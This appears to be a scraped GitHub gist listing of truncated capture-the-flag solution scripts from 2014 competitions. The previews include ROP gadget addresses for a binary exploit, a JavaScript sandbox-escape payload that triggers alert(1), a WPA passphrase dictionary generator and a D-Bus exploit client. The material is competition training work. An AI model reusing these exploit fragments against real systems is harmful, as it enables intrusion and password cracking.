Skip to content

Instantly share code, notes, and snippets.

@volpino
volpino / easypwn.py
Created December 26, 2014 13:38
easypwn Advent Calendar CTF
import struct
import time
from socket import socket
do_read = 0x080480a9
ret2main = 0x8048098
syscall = 0x8048080
null_ptr = 0x8048131
pop_esi_ret = 0x080480eb
new_esi = 0x08048088
@volpino
volpino / reader.py
Created December 26, 2014 13:34
Reader (PPC9) - Advent calendar CTF 2014
from socket import socket
code0 = {}
code0["0"] = "100010100"
code0["1"] = "101001000"
code0["2"] = "101000100"
code0["3"] = "101000010"
code0["4"] = "100101000"
code0["5"] = "100100100"
@volpino
volpino / jspuzzle.js
Created December 7, 2014 11:49
SECCON js puzzle
"use strict";
({"function" :function(){
this[ "null" ] = (new Function( "return" + "/*^_^*/" + "this" ))();
var pattern = "^[w]$";
var r = new RegExp( pattern );
this[ r[ "exec" ]( pattern ) ][ "alert" ]( 1 );
}})[ "Function"[ "toLowerCase" ]() ]();
@volpino
volpino / solver.py
Created December 7, 2014 09:58
SECCON 2014 - crypto200
def mul_inv(a, b):
b0 = b
x0, x1 = 0, 1
if b == 1: return 1
while a > 1:
q = a / b
a, b = b, a%b
x0, x1 = x1 - q * x0, x0
if x1 < 0: x1 += b0
return x1
@volpino
volpino / solve.c
Created December 7, 2014 09:45
SECCON 2014 - crypto200
#include <stdio.h>
int main(int argc, char** argv)
{
signed int result;
unsigned int seed;
FILE *input_file;
FILE *output_file;
char buf;
@volpino
volpino / client.py
Last active August 29, 2015 14:10
9447 CTF - nosql solver
#!/usr/bin/python2
import os, socket, struct, sys
from Crypto.Cipher import AES
class EncryptedStream(object):
key = 'this is not the flag nor the key'[:16]
def __init__(self, host, port):
@volpino
volpino / gen_dictionary.py
Created November 21, 2014 16:06
Shoutr tools
# Part of SPMS project at UTwente
# Generator of all possible WPA passphrases used by Shoutr
for i in range(10000):
print "%04d%04d" % (i, i)
@volpino
volpino / protocol
Created October 23, 2014 19:06
protocol description - peace pipe - hack.lu CTF 2014
====================
+Description of Truth+
====================
Wahkoowah Makawee
* choose random r_w out of Q choose random r_m out of Q *
* Compute Compute *
@volpino
volpino / douchemac.py
Created October 23, 2014 11:06
hack.lu 2014 - douchemac exploit
import dbus
def xor(s1, s2):
return "".join([chr(ord(s1[i]) ^ ord(s2[i])) for i in range(len(s1))])
bus = dbus.bus.BusConnection("tcp:host=wildwildweb.fluxfingers.net,port=1420")
p = bus.get_object('test.test123.Server', '/Server')
server_iface = dbus.Interface(
p,
dbus_interface='test.test123.Server'
@volpino
volpino / crsh.py
Created October 13, 2014 17:39
A familiar system - ASIS CTF Finals 2014
#!/usr/bin/python
#flag = # censored
from gmpy import next_prime, invert, is_prime, mpz
from random import randint
from hashlib import sha1
def makey():
q = next_prime(randint(1, 2**1024))